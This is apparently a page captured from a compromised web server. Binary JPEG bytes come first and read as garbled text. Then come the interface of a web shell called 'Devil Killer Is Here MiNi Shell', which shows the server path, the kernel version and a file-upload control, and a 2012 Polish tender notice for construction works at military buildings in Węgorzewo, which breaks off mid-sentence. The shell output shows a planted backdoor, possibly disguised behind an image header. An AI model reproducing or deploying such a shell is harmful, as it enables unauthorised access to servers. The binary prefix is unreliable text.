JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120223/43173-N-2012.html

<p class="kh_header"><b>Giżycko: Przedmiotem zamówienia są roboty budowlane na terenie kompleksu wojskowego  w JW. nr 2568  w Węgorzewie przy ul. Generała Józefa Bema 7 w budynkach nr 4 i 8.</b><br>
<b>Numer ogłoszenia: 43173 - 2012; data zamieszczenia: 23.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są roboty budowlane na terenie kompleksu wojskowego  w JW. nr 2568  w Węgorzewie przy ul. Generała Józefa Bema 7 w budynkach nr 4 i 8..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
BUDYNEK nr 4  (PKOB 1220)
Malowanie pomieszczeń z częściową wymianą stolarki okiennej na PCV , naprawa  podłóg, wymiana krótkich odcinków instalacji elektrycznej oraz wykonanie natrysków w budynku koszarowym  nr 4  na terenie kompleksu wojskowego JW. Nr 2568                     w Węgorzewie ul. Generała Józefa Bema.
Charakterystyka ogólna obiektu: 
Budynek wybudowany w 1932 roku o konstrukcji, trzykondygnacyjny, podpiwniczony, o konstrukcji murowanej, dach o konstrukcji drewnianej kryty dachówką ceramiczną stolarka w większości z PCV, drzwiowa drewniana. Obiekt wyposażony jest                         w instalację elektryczną, telefoniczną, alarmową,  c.o, wodno- kanalizacyjną                       i odgromową. 

1.	Zakres robót budowlanych obejmuje:
-	wykonanie ścianek działowych z cegły grub . 1/2  cegły,
-	wykonanie tynków cem - wap. II kat na ścianach z cegły oraz obłożenie ścian glazurą,
-	wykonanie posadzki z terakoty GRES wraz z podłożami,
-	naprawa parkietów polegająca na wymianie wyeksploatowanych deszczułek                   z   mocowaniem na gwożdzie, z malowaniem  lakierem olejnym z utwardzaczem wykucie ościeżnic i parapetów okiennych,
-	malowanie ścian i sufitów farba emulsyjną bez wykonania gładzi gipsowych, 
-	malowanie farbą olejną lamperii i cokolików bez szpachlowania, 
-	malowanie farbą olejną stolarki drzwiowej z dwukrotnym szpachlowaniem szpachlówką celulozową po uprzednim oczyszczeniu i zeskrobaniu starej farby
-	malowanie grzejników po uprzednim oczyszczeni i zeskrobaniu łuszczącej się farby olejnej ,
-	montaż okien rozwieranych i uchylno-rozwieranych dwudzielnych o pow. do 2.5 m2  z PCV  w kolorze   białym , profil pięciokomorowy , zestaw szybowy                          o współczynniku U< 1,1 z  wykonaniem przymurowań z cegły grub. ? cegły, dociepleniem ościeży płytami styropianowymi metodą lekką-mokrą przy użyciu    gotowych zapraw klejących - przyklejenie płyt styropianowych do ościeży.
-	docieplenie ścian budynków płytami styropianowymi - system STOPTER - przy  użyciu got. zapraw klejących wraz z przyg. podłoża i ręczne wyk. wyprawy elew. z got. suchej mieszanki - ochrona narożników wypukłych kątownikiem metalowym.
-	obsadzenie podokienników z konglomeratu o wym.165 cm x25cm x 3 cm                      w ścianach z cegieł.
-	Osadzenie ościeżnic metalowych oraz montaż skrzydeł drzwiowych płytowych wewnętrznych jednodzielnych szklonych o powierzchni do 1.6 m2 oszklonych szybą o powierzchni ponad 0.2 m2 fabrycznie wykończonych.

2.	 Zakres robót elektrycznych obejmuje:
-	ręczne wykucie bruzd dla przewodów wtynkowych w gipsie, tynku, gazobetonie   
-	układanie w tynku przewodów wtynkowych YDYp 3x1,5 750V łączny przekrój żył do 7.5 mm2 (podłoże betonowe),
-	układanie w tynku przewodów wtynkowych YDYp 3x2,5  750V  łączny przekrój żył do 7.5 mm2 (podłoże betonowe),
-	przygotowanie podłoża pod osprzęt instalacyjny mocowany na zaprawie cementowej lub gipsowej -wykonanie ślepych otworów w podłożu betonowym,
-	montaż odgałęźników bryzgoszczelnych z tworzywa sztucznego o 3 wylotach mocowanych na zaprawie cementowej lub gipsowej w gotowych otworach,
-	przygotowanie podłoża pod osprzęt instalacyjny mocowany na zaprawie cementowej lub gipsowej -wykonanie ślepych otworów w podłożu betonowym,
-	montaż puszek instalacyjnych podtynkowych PK 60 mocowanych na zaprawie cementowej lub gipsowej w gotowych otworach,
-	montaż łączników dwubiegunowych  podtynkowych w puszce instalacyjnej, 
-	montaż do gotowego podłoża gniazd wtyczkowych podtynkowych bryzgoszczelnych 2-biegunowych z uziemieniem w puszkach z podłączeniem,
-	montaż  opraw świetlówkowych pyłoodpornych w obudowie z tworzyw sztucznych 2x40 W z podłączeniem,
-	demontaż czujników włamania z okien przeznaczonych do wymiany,
-	montaż czujników włamania z uruchomieniem,
-	montaż wentylatora ściennego z podłączeniem. .

3.	 Zakres robót sanitarnych obejmuje:
-	demontaż rur stalowych ocynkowanych  instalacji wodociągowej o śr. nominalnej 15 i 20 mm,
-	montaż rur stalowych ocynkowanych  o śr. 15 i 20 mm o połączeniu gwintowanym instalacji zimnej i ciepłej wody na ścianach w bruzdach, w budynku mieszkalnym,
-	dodatkowe nakłady na wykonanie podejść dołowych do baterii i podgrzewaczy wody o śr. 15 mm,
-	wykonanie płukania, próby ciśnieniowej, dezynfekcji instalacji wodociągowej                   w budynku mieszkalnym,
-	wykonanie badania bakteriologicznego wody z instalacji wodociągowej w budynku  mieszkalnym,
-	wykonanie izolacji ciepłochronnej i przeciwroszeniowej rurociągów o śr. zew. 22 i 28  mm instalacji zimnej i ciepłej wody otulinami polietylonowymi jedną warstwą o  grubości 9 mm,
-	montaż zaworów kulowych mufowych o śr. 15 mm na instalacji ciepłej i zimnej  wody,
-	montaż baterii  natryskowych ściennych o śr. 15 mm, kompletne (wąż natryskowy i słuchawka natryskowa) z dwoma pokrętłami,
-	montaż urządzeń elektrycznych do podgrzewania wody (bojler) o poj. 80 dm3,
-	montaż instalacji kanalizacji sanitarnej z rurociągów PCW o śr. 50 i 110 mm na  ścianach z łączeniem metodą wciskową w budynku mieszkalnym,
-	montaż wpustów ściekowych podłogowych z tworzywa sztucznego o śr. 50 mm,
-	montaż ustępów z sedesami z tworzywa sztucznego i automatami spłukującymi,
-	dodatkowe nakłady na wykonanie podejść odpływowych z rur PCW o śr. 50                   i 110mm,

BUDYNEK nr 8  (PKOB 1220) 
Malowanie pomieszczeń z częściową naprawa podłóg, wymiana krótkich odcinków instalacji elektrycznej oraz wykonanie natrysków w budynku koszarowym  nr 8 na terenie kompleksu wojskowego JW. Nr 2568 w Węgorzewie ul Generała Józefa Bema 7.
1.	 Charakterystyka ogólna obiektu: 
Budynek wybudowany w 1932 roku, trzykondygnacyjny, podpiwniczony                             o konstrukcji murowanej, dach o konstrukcji drewnianej kryty dachówką ceramiczną stolarka w większości z PCV, drzwiowa drewniana. Obiekt wyposażony jest                    w instalację elektryczną, telefoniczną, alarmową,  c.o, wodno- kanalizacyjną                          i odgromową.
2.	Zakres robót budowlanych obejmuje:
-	wykucie ościeżnic i parapetów okiennych,
-	wykonanie ścianek działowych z cegły grub. 1/4 cegły,
-	wykonanie tynków cem - wap. II kat na ścianach z cegły oraz obłożenie ścian glazurą,
-	wykonanie posadzki z terakoty GRES wraz z podłożami,
-	naprawa parkietów polegająca na wymianie wyeksploatowanych deszczułek                  z mocowaniem na gwożdzie z dwukrotnym malowaniem  lakierem olejnym                    z utwardzaczem 
-	malowanie ścian i sufitów farba emulsyjną bez wykonania gładzi gipsowych, 
-	malowanie farbą olejną lamperii i cokolików bez szpachlowania, 
-	malowanie farbą olejną stolarki drzwiowej z dwukrotnym szpachlowaniem szpachlówką celulozową po uprzednim oczyszczeniu i zeskrobaniu starej farby
-	malowanie grzejników po uprzednim oczyszczeni i zeskrobaniu łuszczącej się farby olejnej ,
-	Osadzenie ościeżnic metalowych oraz montaż skrzydeł drzwiowych płytowych wewnętrznych jednodzielnych szklonych o powierzchni do 1.6 m2 oszklonych szybą o powierzchni ponad 0.2 m2 fabrycznie wykończonych.

3.	Zakres robót elektrycznych obejmuje:
-	ręczne wykucie bruzd dla przewodów wtynkowych w gipsie, tynku, gazobetonie,
-	układanie w tynku przewodów wtynkowych YDYp 3x1,5  750V łączny przekrój żył do 7.5 mm2 (podłoże betonowe),
-	układanie w tynku przewodów wtynkowych YDYp 3x2,5  750V  łączny przekrój żył do 7.5 mm2 (podłoże betonowe),
-	przygotowanie podłoża pod osprzęt instalacyjny mocowany na zaprawie cementowej lub gipsowej -wykonanie ślepych otworów w podłożu betonowym,
-	montaż odgałęźników bryzgoszczelnych z tworzywa sztucznego o 3 wylotach mocowanych na zaprawie cementowej lub gipsowej w gotowych otworach,
-	przygotowanie podłoża pod osprzęt instalacyjny mocowany na zaprawie cementowej lub gipsowej -wykonanie ślepych otworów w podłożu betonowym,
-	montaż puszek instalacyjnych podtynkowych PK 60 mocowanych na zaprawie cementowej lub gipsowej w gotowych otworach,
-	montaż łączników dwubiegunowych  podtynkowych w puszce instalacyjnej, 
-	montaż do gotowego podłoża gniazd wtyczkowych podtynkowych bryzgoszczelnych 2-biegunowych z uziemieniem w puszkach z podłączeniem,
-	montaż  opraw świetlówkowych pyłoodpornych w obudowie z tworzyw sztucznych 2x40 W z podłączeniem

4.	 Zakres robót sanitarnych obejmuje:
-	demontaż rurociągu stalowego ocynkowanego instalacji wodociągowej o śr. 25 mm,
-	 montaż rur stalowych ocynkowanych o śr. 15 i 20 mm o połączeniu gwintowanym instalacji zimnej i ciepłej wody na ścianach w bruzdach, w budynku mieszkalnym,
-	wykonanie płukania, próby ciśnieniowej, dezynfekcji instalacji wodociągowej                    w budynku mieszkalnym,
-	dodatkowe nakłady na wykonanie podejść dołowych do baterii i podgrzewaczy wody o śr. 15 mm,
-	wykonanie badania bakteriologicznego wody z instalacji wodociągowej                          w budynku mieszkalnym,
-	wykonanie izolacji ciepłochronnej i przeciwroszeniowej rurociągów o śr. zew. 22  i 28  mm instalacji zimnej i ciepłej wody otulinami polietylonowymi jedną warstwą      o  grubości 9 mm,
-	montaż zaworów kulowych mufowych o śr. 15 mm na instalacji ciepłej i zimnej wody,
-	montaż baterii  natryskowych ściennych o śr. 15 mm, kompletne (wąż natryskowy i słuchawka natryskowa) z dwoma pokrętłami,
-	montaż urządzeń elektrycznych do podgrzewania wody (bojler) o poj. 80 dm3,
-	montaż instalacji kanalizacji sanitarnej z rurociągów PCW o śr. 50 i 110 mm na  ścianach z łączeniem metodą wciskową w budynku mieszkalnym,
-	montaż wpustów ściekowych podłogowych z tworzywa sztucznego o śr. 50 mm,
-	montaż ustępów z sedesami z tworzywa sztucznego i automatami spłukującymi,
-	dodatkowe nakłady na wykonanie podejść odpływowych z rur PCW o śr. 50                   i 110mm,

UWAGA: 
Szczegółowy zakres robót do realizacji określa niniejszy opis przedmiotu  zamówienia, specyfikacja techniczna wykonania i odbioru robót (załącznik nr 7 do SIWZ) oraz przedmiary robót (załącznik nr 9 i 10 do SIWZ).
Przyjęte w opisach technologie i materiały podające producentów określają  wymagania techniczne i dopuszcza się stosowanie zamienników materiałowych, które nie obniżą wartości użytkowej i jakościowej wykonanych elementów zamówienia.
Warunki realizacyjne robót:
1.	realizacja robót w godzinach 700-1530 (istnieje możliwość pracy do godziny 1800 w dniach poniedziałek- piątek oraz do godz.1500 w sobotę po uzgodnieniu                      z Dowódcą Jednostki);
2.	Zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy dostarczył trzy egzemplarze kosztorysów ofertowych (na budynek 4 i 8), które będą stanowiły załączniki do umowy;
3.	Zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy ustanowił  kierownika budowy (robót) posiadającego uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie (w rozumieniu ustawy z dnia 7 lipca 1994 roku - Prawo budowlane) oraz dostarczy dowód jego przynależności do Izby Inżynierów Budownictwa i aktualne ubezpieczenie OC obejmujące okres realizacji zamówienia;
4.	Wykonawca robót (kierownik budowy) w pełni odpowiada za bezpieczeństwo              i higienę pracy  w miejscu realizacji robót, oraz za zachowanie bezpieczeństwa pożarowego;
5.	Zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy dokonał ubezpieczenia budowy na kwoty nie mniejszą niż:
budynek nr 4 - 1 383 000,00 zł. (słownie: milion trzysta osiemdziesiąt trzy tysiące złotych),
budynek nr 8 - 1 693 000,00 zł. (słownie: milion sześćset dziewięćdziesiąt trzy tysiące złotych),  
oraz dostarczył dowód ubezpieczenia
6.	Wykonawca zobowiązany będzie do pokrycia kosztów poboru energii elektrycznej, poboru wody i odprowadzenia ścieków związanych z realizacją robót i potrzebami socjalnymi. Sposób rozliczenia został określony we wzorze umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium zgodnie z art. 45 ustawy.
A.	Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości 5 500,00 zł. (słownie: pięć tysięcy pięćset złotych).
B.	Wadium musi być wniesione  przed upływem terminu składania ofert.
C.	Wadium może być wnoszone w jednej lub w kilku następujących formach: 
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-Kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.). 
D.	Wadium wniesione w pieniądzu Wykonawca wpłaca na rachunek bankowy zamawiającego  prowadzony przez:  NBP O/O Olsztyn  85 1010 1397 0020 1713 9120 0000 z dopiskiem wadium - Roboty budowlane na terenie kompleksu wojskowego w JW. Nr 2568                          w Węgorzewie przy  ul. Generała Józefa Bema 7 budynek nr 4 i nr 8.
E.	Do oferty należy dołączyć kserokopię dowodu bankowego potwierdzającego wniesienie wadium w pieniądzu. W przypadku realizowania przez Wykonawcę rozliczeń bankowych w formie elektronicznej do oferty należy załączyć potwierdzenie wykonania operacji bankowej w formie kserokopii wydruku operacji. 
     Zarówno kserokopia dowodu bankowego jak i dowodu pochodzącego 
z systemu elektronicznych rozliczeń - wymaga potwierdzenia przez Wykonawcę za zgodność z oryginałem</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na podstawie art. 44 ustawy p.z.p (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na podstawie art. 44 ustawy p.z.p (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na podstawie art. 44 ustawy p.z.p (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na podstawie art. 44 ustawy p.z.p (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłaconą polisę lub inny dokument ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (suma ubezpieczenia nie niższa niż  100 000,00 zł).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>FORMULARZ OFERTOWY ­ wypełniony i podpisany wg wzoru Zamawiającego (załącznik nr 1 do SIWZ ).
KOSZTORYS Y OFERTOWE NA BUDYNKI NR 4 I 8 - sporządzone na podstawie:
-	specyfikacji technicznej wykonania i odbioru robót (załącznik nr 7 do SIWZ),  
-	założeń wyjściowych do kosztorysowania ( załącznik nr 8 do SIWZ),
-	przedmiaru robót budynek nr 4 ( załącznik nr 9 do SIWZ),
-	przedmiaru robót budynek nr 8 ( załącznik nr 10 do SIWZ).
PARAFOWANY WZÓR UMOWY - parafka na każdej stronie (załącznik nr 5 do SIWZ ).
ZESTAWIENIE POZYCJI PRZEDMIAROWYCH Z CENAMI JEDNOSTKOWYMI  - wg wzoru Zamawiającego (załącznik nr 2 do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający zastrzega możliwość zmiany wysokości zobowiązania wynikającego z oferty Wykonawcy, z którym zawrze umowę na wykonanie robót budowlanych w zakresie konserwacji pomieszczeń II i III piętra w budynku nr  3 JW. 4352 w Giżycku ul. Nowowiejska 20 w wyniku niniejszego postępowania w przypadku zmiany stawki podatku od towarów i usług w 2012r. w formie aneksu.
2.	Zamawiający dopuszcza zmianę terminu zakończenia robót w przypadku:
